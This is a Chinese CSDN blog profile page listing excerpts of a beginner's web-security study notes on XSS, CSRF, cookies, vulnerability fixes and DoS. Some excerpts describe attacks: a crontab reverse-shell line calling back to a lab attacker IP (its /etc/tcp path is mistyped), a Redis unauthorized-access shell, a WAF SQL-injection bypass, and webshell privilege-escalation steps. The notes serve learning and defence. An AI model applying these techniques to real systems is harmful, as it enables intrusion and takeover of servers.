白帽梦想家
码龄7年
关注
提问 私信
  • 博客:576,758
    576,758
    总访问量
  • 80
    原创
  • 1,267,917
    排名
  • 541
    粉丝
  • 1
    铁粉

个人简介:web安全初学者,喜欢网络攻防艺术,希望有朝一日能成为一名独当一面的白白白白白帽子 注释:我在CSDN上发放的所有原创内容都是在学习过程中笔记总结而来,每个字都是手打上去的,但其中有些地方可能会直接引鉴某些大牛的原话,希望各位大大不要介意,因为我真的觉得你们总结的话很经典,初学者比较好理解。。。 如果原作者有任何不满意,可以直接联系我,我会直接将其删除。最近复习知识发现自己刚开始总结的好几篇笔记都有比较严重的错误和错字,等我面试完会改正!

IP属地以运营商信息为准,境内显示到省(区、市),境外显示到国家(地区)
IP 属地:河南省
  • 加入CSDN时间: 2018-01-11
博客简介:

18年3月萌新白帽子

查看详细资料
个人成就
  • 获得338次点赞
  • 内容获得111次评论
  • 获得1,755次收藏
创作历程
  • 1篇
    2019年
  • 85篇
    2018年
成就勋章
TA的专栏
  • LINUX相关操作
    31篇
  • 安全扫描工具的使用
    1篇
  • 安全漏洞
    11篇
  • 其他
    5篇
  • web安全
    21篇
  • Python 编程
    6篇
  • sqli_labs闯关
    1篇
  • XSS闯关
    1篇
  • 木马的使用
    1篇
  • 渗透姿势收集
    3篇
兴趣领域 设置
  • 网络空间安全
    web安全
创作活动更多

如何做好一份技术文档?

无论你是技术大神还是初涉此领域的新手,都欢迎分享你的宝贵经验、独到见解与创新方法,为技术传播之路点亮明灯!

175人参与 去创作
  • 最近
  • 文章
  • 代码仓
  • 资源
  • 问答
  • 帖子
  • 视频
  • 课程
  • 关注/订阅/互动
  • 收藏
搜TA的内容
搜索 取消

XSS进阶小教程

一、在了解XSS之前,我们首先需要先了解一下HTML 与 JavaScript 自解码机制。1、HTML的自解码机制 浏览器在解析HTML标签属性值内的代码前,会先对下列两种编码进行解码,然后再对属性中的代码进行解析。(1)、进制解码:&#xH;(十六进制格式)、&#D;(十进制格式)。编码中最后的分号(;)可以不要。且16进制中用来表示10~15的a~f对大...
原创
发布博客 2019.02.25 ·
4094 阅读 ·
5 点赞 ·
1 评论 ·
14 收藏

不同于Token和Refer头校验的另一种CSRF防御办法

        事情的情况是这样的,前段时间在工作中发现XX系统存在CSRF漏洞,我在数据包内并未看到对应的Token参数,测试Refer头后发现XX系统并未对请求来源(refer)进行相关校验。我便认为此处存在CSRF漏洞并将该漏洞发送给了XX系统的相关负责人。但是过了几天后XX系统的负责人发来一份反馈邮件,邮件说他们系统做了CSRF校验但用的不是Token也不是Refer。而是如下方法:...
原创
发布博客 2018.12.24 ·
2385 阅读 ·
1 点赞 ·
2 评论 ·
2 收藏

敏感信息明文传输相关问题小结

最近在工作中,由于同事对敏感信息明文传输这个漏洞认识不深,导致工作出了一些问题。经过一番研究后,发现了其中的一些小知识点,在这里跟大家分享下,具体情况是这样的:1.我们在做安全测试的时候,经常可以通过Burpsuit抓包看到一些以明文方式呈现的敏感信息,比如在页面登陆处,我们输入账号密码,通过Burpsuit抓包,可以看到如下类似的数据包。 可以看到在数据包中,用户登陆用的账号和密...
原创
发布博客 2018.12.24 ·
11284 阅读 ·
10 点赞 ·
1 评论 ·
28 收藏

浅淡XSS跨站脚本攻击的防御方法

一、HttpOnly属性 为Cookie中的关键值设置httponly属性,众所周知,大部分XSS(跨站脚本攻击)的目的都是通过浏览器的同源策略,来获取用户Cookie,从而冒充用户登陆系统的。 如果为Cookie中用于用户认证的关键值设置httponly属性,浏览器将会禁止js通过同源策略访问cookie中设有httponly属性的信息,因此以劫...
原创
发布博客 2018.11.13 ·
12716 阅读 ·
5 点赞 ·
3 评论 ·
26 收藏

服务器set-cookie出现同名key的问题

首先简单介绍一下服务器set-cookie时关于path的规则cookie的path属性:它表示此cookie在哪个路径下起作用。如果服务器不设置cookie的path或设置了相同的path,则名字相同的Cookie视为相同的Cookie,后面的会覆盖前面的COOKIE,服务器设置COOKIE时是大小写敏感的。如果服务器为同名的Cookie设置了不同的path,那么这就是两个不同的CO...
原创
发布博客 2018.08.22 ·
7522 阅读 ·
4 点赞 ·
1 评论 ·
3 收藏

Ubuntu计划任务反弹shell

首先介绍一下实验环境1.被攻击者:Ubuntu 192.168.0.82.攻击者:kali  192.168.0.127 首先第一步在Ubuntu系统下添加crontab 计划任务* * * * * bash -i  >& /etc/tcp/192.168.0.127/8888 0>&1 第二步在kali系统下使用nc命令监听8888端口...
原创
发布博客 2018.08.19 ·
4249 阅读 ·
2 点赞 ·
0 评论 ·
9 收藏

为什么CSRF Token写在COOKIE里面

最近做渗透测试的时候经常看到用户的COOKIE信息里带有CSRF等字样的信息,问了一下同事,他们说这个是用来防御CSRF的字段。这一下可把我弄懵了,因为我对CSRF的理解是:攻击者盗用用户的COOKIE执行非用户本意的操作。我的想法是,用户的COOKIE就像是一张门禁卡一样,攻击者可以盗用用户的门禁卡,以被盗用户的身份来执行一些设计增删改的操作,既然用户已经盗用了用户的COOKIE刷卡进门...
原创
发布博客 2018.08.14 ·
22009 阅读 ·
14 点赞 ·
42 评论 ·
44 收藏

Cookie的属性和属性作用

Cookie属性:name字段:一个cookie的名称value字段:一个cookie的值domain字段:可以访问此cookie的域名path字段:可以访问此cookie的页面路径Size字段:此cookie大小http字段:cookie的httponly属性,若此属性为True,则只有在http请求头中会有此cookie信息,而不能通过document.cookie来访问此cookie。sec...
原创
发布博客 2018.07.12 ·
7895 阅读 ·
4 点赞 ·
0 评论 ·
13 收藏

关于为什么同一网站下返回的404页面不一样

今天在上班的时候偶然发现访问同一个网站,不同目录时返回的404页面不同。具体效果如下:情况1:情况2:因为是公司签了保密协议的东西,漏洞还未修复,所以我把IP盖住了,不过这俩确实是同意网站不同路径。在解释这个问题之前我们先来了解一下用户正常请求一个页面的流程:这里Web浏览器发送的请求就是我们在浏览器地址栏里输入的URL中间件就是指web服务器(本次测试的web服务器所使用的中间件是Tomcat)...
原创
发布博客 2018.07.12 ·
906 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

Bypass之D盾IIS防火墙SQL联合注入绕过(新版)

这种技术文章,不好意思标原创了,一下内容均来自公众号Bypass实验环境IIS+ASPX+MSSQL一、MSSQL特性在MSSQL中,参数和union之间的位置,常见的可填充的方式有如下几种:1.空白字符01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,202.注...
转载
发布博客 2018.07.04 ·
12083 阅读 ·
0 点赞 ·
1 评论 ·
15 收藏

Bypass之D盾IIS防火墙SQL注入防御

并非原创,标记原创只是为了涨积分,下面有原创大佬的原帖连接。一、针对 IIS+PHP+MYSQL配置的D盾防火墙绕过首先D盾大家在做渗透测试的时候多多少少应该都有遇到过就长这个样子,他会在你觉得发现漏洞的时候出现。。。。总之很烦人绕过姿势一、白名单PHP中的PHP_INFO问题,简单来说就是  http://x.x.x.x./3.php?id=1 等价于 http://x.x.x.x/3.php/...
原创
发布博客 2018.07.04 ·
3052 阅读 ·
1 点赞 ·
0 评论 ·
9 收藏

XSS,CSRF,SSRF三种漏洞的区别和共同点

以下言论均是个人在学习过程中总结而来,仅代表个人观点,由于博主也是web安全初学者,所以发表的观点很可能会存在一些错误或者有些不严谨的地方,如果您觉得哪里说的不对或者不合适,请随时在下方留言,希望能跟大家能够一起学习、进步,感谢。个人总结:相同点:XSS,CSRF,SSRF三种常见的Web服务端漏洞均是由于,服务器端对用户提供的可控数据过于信任或者过滤不严导致的。不同点:XSS是服务器对用户输入的...
原创
发布博客 2018.07.03 ·
10578 阅读 ·
7 点赞 ·
0 评论 ·
34 收藏

常见Web漏洞的修复方法

SQL注入1、使用转义函数对xxx参数进行转义2、检查数据类型,使用函数对数据类型进行强制转换3、使用预编译语句XSS1、使用转义函数转义xxx参数2、重要cookie使用HttpOnly,防止Cookie被盗(1) 对一些特殊的标签进行转义;(2) 直接过滤掉JavaScript事件标签和一些特殊的html标签;(3) 将重要的cookie标记为http only;(4) 只允许用户输入我们期望...
原创
发布博客 2018.07.03 ·
2951 阅读 ·
1 点赞 ·
0 评论 ·
3 收藏

DOS和DDOS攻击的原理和区别

DOS:中文名称是拒绝服务,一切能引起DOS行为的攻击都被称为DOS攻击。该攻击的效果是使得计算机或网络无法提供正常的服务。常见的DOS攻击有针对计算机网络带宽和连通性的攻击。 DOS是单机于单机之间的攻击。DOS攻击的原理:首先攻击者向被攻击的服务器发送大量的虚假IP请求,被攻击者在收到请求后返回确认信息,等待攻击者进行确认,(此处需要拥有HTTP协议工作方式和TCP三次握手的基本知识)该过程需...
原创
发布博客 2018.07.03 ·
10310 阅读 ·
6 点赞 ·
0 评论 ·
16 收藏

redis未授权访问反弹shell

一、redis的安装1.使用wget命令获取redis的安装包wget http://download.redis.io/releases/redis-4.0.8.tar.gz2.tar –zxvf redis-4.0.8.tar.gz解压改文件然后进入redis-4.0.8这个文件夹   cd redis-4.0.8然后执行make命令由于我们刚刚安装好redis数据库,还未创建用户,默认使用的...
原创
发布博客 2018.06.26 ·
4582 阅读 ·
0 点赞 ·
3 评论 ·
2 收藏

XSS跨站脚本攻击简介

首先介绍一下JavaScript中的同源策略:JavaScript中将协议,域名,端口,三者完全相同的网页视为同源。在HTML语音中,有部分标签在引用第三方资源时,不受同源限制<script><img><iframe><Link>除此之外还有好多上述这种带SRC属性的标签,在加载时,实际上是生成一条get请求,向指定服务器申请资源确定脚本的源,取决于...
原创
发布博客 2018.06.25 ·
890 阅读 ·
0 点赞 ·
0 评论 ·
2 收藏

大马提权详细过程

1.首先利用菜刀连接我们上传的小马文件2.在网站的www根目录下上传我们准备好的的大马文件3.这里我们上传的大马名称是chao.asp4.之后打开浏览器访问我们刚刚登陆的大马文件地址,并输入密码clever5.登陆进去之后如果发现CMD功能无法使用那么我们就自己通过菜刀上传一个CMD,我将其命名为smallchao.exe6.点击大马页面左侧的执行CMD这一栏7.在shell路径这一栏里输入服务器...
原创
发布博客 2018.06.25 ·
16385 阅读 ·
13 点赞 ·
6 评论 ·
46 收藏

任意命令执行漏洞简介

命令成因脚本语言有点事简洁,方便,但也伴随一些问题,比如运行速度慢,无法接触系统底层,如果我们开发的应用(特别是企业级的一些应用)需要除去web的特殊功能时,就需要调用一些外部程序。在应用需要去调用外部程序去处理的情况下,就会用到一些执行系统命令的函数。如php中的system,exec,shell_exec等,当用户可以控制命令执行的函数时,可以恶意注入系统命令到正常命令中,造成命令执行在PHP...
原创
发布博客 2018.06.24 ·
3853 阅读 ·
1 点赞 ·
0 评论 ·
5 收藏

任意代码执行漏洞简介

一、任意代码执行漏洞思维导图:代码执行漏洞的成因:应用程序在调用一些能够将字符串转换为代码的函数(例如php中的eval中),没有考虑用户是否控制这个字符串,将造成代码执行漏洞。代码执行漏洞的常用函数PHP:eval,assert,preg_replace()+/e 模式Javascript:evalVbscript:Execute、EvalPython: execJava: Java中没有类似p...
原创
发布博客 2018.06.24 ·
6603 阅读 ·
3 点赞 ·
0 评论 ·
7 收藏

CSRF跨站请求伪造

CSRF介绍:CSRF中文名称:跨站请求伪造,是一种“挟持用户”在当前已登陆的Web应用程序上执行“非本意操作”的攻击方法。一、CSRF回放攻击流程套用老师所给的一张攻击原理图从这张流程图里我们总结一下CSRF攻击生效所需要的两个必要条件1.被攻击者成功登陆信任站点A,并在本地生成cookie2.用户使用同一浏览器在不退出的情况下,访问带有CSRF代码的网站B二、原理介绍首先说明一点,我们并没有挟...
原创
发布博客 2018.06.19 ·
550 阅读 ·
0 点赞 ·
0 评论 ·
2 收藏
加载更多